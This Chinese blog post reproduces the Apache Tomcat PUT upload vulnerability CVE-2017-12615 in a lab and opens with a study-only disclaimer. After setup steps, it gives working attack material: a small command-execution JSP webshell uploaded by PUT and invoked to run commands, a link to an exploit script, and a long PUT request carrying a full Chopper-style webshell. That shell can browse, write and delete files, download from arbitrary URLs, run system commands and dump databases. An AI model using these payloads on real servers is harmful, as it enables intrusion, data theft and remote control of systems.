cat-nineteen
0%

Tomcat 任意上传漏洞(CVE-2017-12615)

发表于 更新于 分类于

漏洞描述

声明:文中所涉及的技术、思路和工具仅供以安全为目的的学习交流使用,任何人不得将其用于非法用途以及盈利等目的,否则后果自行承担!

2017年9月19日,Apache Tomcat官方确认并修复了两个高危漏洞,其中就有远程代码执行漏洞(CVE-2017-12615)。当 启用了HTTP PUT请求方法(例如,将 readonly 初始化参数由默认值设置为 false),攻击者将有可能可通过精心构造的攻击请求数据包向服务器上传包含任意代码的 JSP 文件,JSP文件中的恶意代码将能被服务器执行。导致服务器上的数据泄露或获取服务器权限。

影响版本

1
Apache Tomcat 7.0.0 - 7.0.81

环境搭建

1. docker搭建;

1
2
3
https://github.com/vulhub/vulhub.git
cd vulhub/tomcat/CVE-2017-12615
docker-compose up -d

访问 http://xxx.xxx.xxx.xxx:8080/ 正常即可;

image-20210826203327824

2. windows搭建;

1
2
环境:
windows 7/Java1.8.0/tomcat7.0.70

安装Java环境;

安装tomcat环境;tomcat历史版本下载

进入apache-tomcat-7.0.70\bin文件并新起cmd执行;

1
startup.bat

报错解决

image-20210826203910827

在setclasspath.bat(Linux为setclasspath.sh,并将set改为export)的开头手动添加环境变量。

1
2
set JAVA_HOME=C:\Program Files (x86)\Java\bin
set JRE_HOME=C:\Program Files (x86)\Java\jre

image-20210826204131112

保存后再次cmd执行;

1
startup.bat

image-20210826204220268

环境启动成功。

漏洞原理

漏洞产生的主要原因来自于conf/web.xml文件配置错误,readonly开启了false,导致可以使用PUT/DELETE请求方法操作文件;

image-20210826204703445

漏洞复现

浏览器打开http://127.0.0.1:8080/

image-20210826204406230

浏览器中刷新一下页面,brup中将会捕获到流量;

image-20210826204431390

使用PUT请求方式写入hacker.jsp webshell,如下图操作;

image-20210826204445757

hacker.jsp如下;

1
2
3
<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp

+"\\n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><%if("safedog".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"</pre>");}else{out.println(":-)");}%>

Response中返回HTTP/1.1 201 Created,说明文件创建成功。

浏览器访问:

1
http://192.168.40.137:8080/hacker.jsp?pwd=safedog&cmd=ipconfig

image-20210826204538095

漏洞验证脚本

1
https://github.com/ianxtianxt/CVE-2017-12615

webshell

(需使用菜刀链接)

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
PUT /webshell.jsp/ HTTP/1.1  
Host: 127.0.0.1:8080  
Content-Length: 6239  
<%@page import="java.io.*,java.util.*,java.net.*,java.sql.*,java.text.*"%>  
<%!  
  String Pwd = "hetian";  
  String cs = "UTF-8";  
   String EC(String s) throws Exception {  
       return new String(s.getBytes("ISO-8859-1"),cs);  
   }  
   Connection GC(String s) throws Exception {  
       String[] x = s.trim().split("choraheiheihei");  
     Class.forName(x[0].trim());  
      if(x[1].indexOf("jdbc:oracle")!=-1){  
          return DriverManager.getConnection(x[1].trim()+":"+x[4],x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);  
      }else{  
          Connection c = DriverManager.getConnection(x[1].trim(),x[2].equalsIgnoreCase("[/null]")?"":x[2],x[3].equalsIgnoreCase("[/null]")?"":x[3]);  
        if (x.length > 4) {  
              c.setCatalog(x[4]);  
          }  
          return c;  
       }  
   }  
  void AA(StringBuffer sb) throws Exception {  
      File k = new File("");  
      File r[] = k.listRoots();  
       for (int i = 0; i < r.length; i++) {  
         sb.append(r[i].toString().substring(0, 2));  
     }  
  }  
   void BB(String s, StringBuffer sb) throws Exception {  
       File oF = new File(s), l[] = oF.listFiles();  
     String sT, sQ, sF = "";  
        java.util.Date dt;  
      SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");  
     for (int i = 0; i < l.length; i++) {  
          dt = new java.util.Date(l[i].lastModified());  
           sT = fm.format(dt);  
           sQ = l[i].canRead() ? "R" : "";  
           sQ += l[i].canWrite() ? " W" : "";  
           if (l[i].isDirectory()) {  
               sb.append(l[i].getName() + "/\t" + sT + "\t" + l[i].length()+ "\t" + sQ + "\n");  
          } else {  
               sF+=l[i].getName() + "\t" + sT + "\t" + l[i].length() + "\t"+ sQ + "\n";  
           }  
       }  
       sb.append(sF);  
   }  
   void EE(String s) throws Exception {  
       File f = new File(s);  
      if (f.isDirectory()) {  
           File x[] = f.listFiles();  
           for (int k = 0; k < x.length; k++) {  
               if (!x[k].delete()) {  
                  EE(x[k].getPath());  
               }  
           }  
       }  
      f.delete();  
}  
  void FF(String s, HttpServletResponse r) throws Exception {  
       int n;  
     byte[] b = new byte[512];  
     r.reset();  
     ServletOutputStream os = r.getOutputStream();  
       BufferedInputStream is = new BufferedInputStream(new FileInputStream(s));  
       os.write(("->" + "|").getBytes(), 0, 3);  
      while ((n = is.read(b, 0, 512)) != -1) {  
           os.write(b, 0, n);  
     }  
   os.write(("|" + "<-").getBytes(), 0, 3);  
       os.close();  
     is.close();  
  }  
  void GG(String s, String d) throws Exception {  
     String h = "0123456789ABCDEF";  
      File f = new File(s);  
      f.createNewFile();  
     FileOutputStream os = new FileOutputStream(f);  
      for (int i = 0; i < d.length(); i += 2) {  
        os.write((h.indexOf(d.charAt(i)) << 4 | h.indexOf(d.charAt(i + 1))));  
     }  
    os.close();  
  }  
  void HH(String s, String d) throws Exception {  
      File sf = new File(s), df = new File(d);  
       if (sf.isDirectory()) {  
          if (!df.exists()) {  
              df.mkdir();  
         }  
           File z[] = sf.listFiles();  
          for (int j = 0; j < z.length; j++) {  
              HH(s + "/" + z[j].getName(), d + "/" + z[j].getName());  
         }  
       } else {  
          FileInputStream is = new FileInputStream(sf);  
           FileOutputStream os = new FileOutputStream(df);  
          int n;  
          byte[] b = new byte[512];  
           while ((n = is.read(b, 0, 512)) != -1) {  
               os.write(b, 0, n);  
         }  
           is.close();  
           os.close();  
       }  
   }  
   void II(String s, String d) throws Exception {  
       File sf = new File(s), df = new File(d);  
      sf.renameTo(df);  
   }  
void JJ(String s) throws Exception {  
       File f = new File(s);  
      f.mkdir();  
   }  
 void KK(String s, String t) throws Exception {  
      File f = new File(s);  
    SimpleDateFormat fm = new SimpleDateFormat("yyyy-MM-dd HH:mm:ss");  
      java.util.Date dt = fm.parse(t);  
   f.setLastModified(dt.getTime());  
   }  
  void LL(String s, String d) throws Exception {  
      URL u = new URL(s);  
      int n = 0;  
      FileOutputStream os = new FileOutputStream(d);  
       HttpURLConnection h = (HttpURLConnection) u.openConnection();  
       InputStream is = h.getInputStream();  
      byte[] b = new byte[512];  
      while ((n = is.read(b)) != -1) {  
         os.write(b, 0, n);  
      }  
      os.close();  
       is.close();  
    h.disconnect();  
  }  
  void MM(InputStream is, StringBuffer sb) throws Exception {  
       String l;  
       BufferedReader br = new BufferedReader(new InputStreamReader(is));  
      while ((l = br.readLine()) != null) {  
          sb.append(l + "\r\n");  
      }  
  }  
  void NN(String s, StringBuffer sb) throws Exception {  
      Connection c = GC(s);  
      ResultSet r = s.indexOf("jdbc:oracle")!=-1?c.getMetaData().getSchemas():c.getMetaData().getCatalogs();  
      while (r.next()) {  
           sb.append(r.getString(1) + "\t|\t\r\n");  
       }  
      r.close();  
       c.close();  
    }  
  void OO(String s, StringBuffer sb) throws Exception {  
   Connection c = GC(s);  
      String[] x = s.trim().split("choraheiheihei");  
     ResultSet r = c.getMetaData().getTables(null,s.indexOf("jdbc:oracle")!=-1?x.length>5?x[5]:x[4]:null, "%", new String[]{"TABLE"});  
      while (r.next()) {  
         sb.append(r.getString("TABLE_NAME") + "\t|\t\r\n");  
     }  
     r.close();  
   c.close();  
 }  
   void PP(String s, StringBuffer sb) throws Exception {  
      String[] x = s.trim().split("\r\n");  
       Connection c = GC(s);  
     Statement m = c.createStatement(1005, 1007);  
      ResultSet r = m.executeQuery("select * from " + x[x.length-1]);  
      ResultSetMetaData d = r.getMetaData();  
      for (int i = 1; i <= d.getColumnCount(); i++) {  
         sb.append(d.getColumnName(i) + " (" + d.getColumnTypeName(i)+ ")\t");  
   }  
      r.close();  
    m.close();  
       c.close();  
   }  
  void QQ(String cs, String s, String q, StringBuffer sb,String p) throws Exception {  
       Connection c = GC(s);  
      Statement m = c.createStatement(1005, 1008);  
     BufferedWriter bw = null;  
      try {  
          ResultSet r = m.executeQuery(q.indexOf("--f:")!=-1?q.substring(0,q.indexOf("--f:")):q);  
          ResultSetMetaData d = r.getMetaData();  
           int n = d.getColumnCount();  
         for (int i = 1; i <= n; i++) {  
              sb.append(d.getColumnName(i) + "\t|\t");  
        }  
          sb.append("\r\n");  
          if(q.indexOf("--f:")!=-1){  
             File file = new File(p);  
               if(q.indexOf("-to:")==-1){  
                   file.mkdir();  
             }  
            bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(q.indexOf("-to:")!=-1?p.trim():p+q.substring(q.indexOf("--f:") + 4,q.length()).trim()),true),cs));  
          }  
         while (r.next()) {  
              for (int i = 1; i <= n; i++) {  
                  if(q.indexOf("--f:")!=-1){  
                        bw.write(r.getObject(i)+""+"\t");  
                        bw.flush();  
                    }else{  
                        sb.append(r.getObject(i)+"" + "\t|\t");  
                    }  
                }  
                if(bw!=null){bw.newLine();}  
                sb.append("\r\n");  
            }  
            r.close();  
            if(bw!=null){bw.close();}  
       } catch (Exception e) {  
           sb.append("Result\t|\t\r\n");  
            try {  
               m.executeUpdate(q);  
                sb.append("Execute Successfully!\t|\t\r\n");  
           } catch (Exception ee) {  
               sb.append(ee.toString() + "\t|\t\r\n");  
           }  
       }  
        m.close();  
     c.close();  
}  
%>  
<%  
//String Z = EC(request.getParameter(Pwd) + "", cs);  
   cs = request.getParameter("code") != null ? request.getParameter("code")+ "":cs;  
  request.setCharacterEncoding(cs);  
   response.setContentType("text/html;charset=" + cs);  
  StringBuffer sb = new StringBuffer("");  
if (request.getParameter(Pwd) != null) {  
  try {  
     String Z = EC(request.getParameter("action") + "");  
       String z1 = EC(request.getParameter("z1") + "");  
       String z2 = EC(request.getParameter("z2") + "");  
      sb.append("->" + "|");  
      String s = request.getSession().getServletContext().getRealPath("/");  
     if (Z.equals("A")) {  
          sb.append(s + "\t");  
           if (!s.substring(0, 1).equals("/")) {  
             AA(sb);  
          }  
      } else if (Z.equals("B")) {  
          BB(z1, sb);  
       } else if (Z.equals("C")) {  
           String l = "";  
          BufferedReader br = new BufferedReader(new InputStreamReader(new FileInputStream(new File(z1))));  
          while ((l = br.readLine()) != null) {  
               sb.append(l + "\r\n");  
        }  
           br.close();  
      } else if (Z.equals("D")) {  
          BufferedWriter bw = new BufferedWriter(new OutputStreamWriter(new FileOutputStream(new File(z1))));  
          bw.write(z2);  
          bw.close();  
           sb.append("1");  
      } else if (Z.equals("E")) {  
            EE(z1);  
           sb.append("1");  
       } else if (Z.equals("F")) {  
          FF(z1, response);  
       } else if (Z.equals("G")) {  
         GG(z1, z2);  
           sb.append("1");  
      } else if (Z.equals("H")) {  
          HH(z1, z2);  
          sb.append("1");  
       } else if (Z.equals("I")) {  
          II(z1, z2);  
           sb.append("1");  
       } else if (Z.equals("J")) {  
           JJ(z1);  
         sb.append("1");  
       } else if (Z.equals("K")) {  
           KK(z1, z2);  
           sb.append("1");  
      } else if (Z.equals("L")) {  
           LL(z1, z2);  
         sb.append("1");  
    } else if (Z.equals("M")) {  
           String[] c = { z1.substring(2), z1.substring(0, 2), z2 };  
           Process p = Runtime.getRuntime().exec(c);  
         MM(p.getInputStream(), sb);  
         MM(p.getErrorStream(), sb);  
      } else if (Z.equals("N")) {  
          NN(z1, sb);  
        } else if (Z.equals("O")) {  
            OO(z1, sb);  
       } else if (Z.equals("P")) {  
           PP(z1, sb);  
       } else if (Z.equals("Q")) {  
        QQ(cs, z1, z2, sb,z2.indexOf("-to:")!=-1?z2.substring(z2.indexOf("-to:")+4,z2.length()):s.replaceAll("\\\\", "/")+"images/");  
     }  
    } catch (Exception e) {  
 sb.append("ERROR" + ":// " + e.toString());  
  }  
sb.append("|" + "<-");  
out.print(sb.toString());  
}  
%>

欢迎关注我的其它发布渠道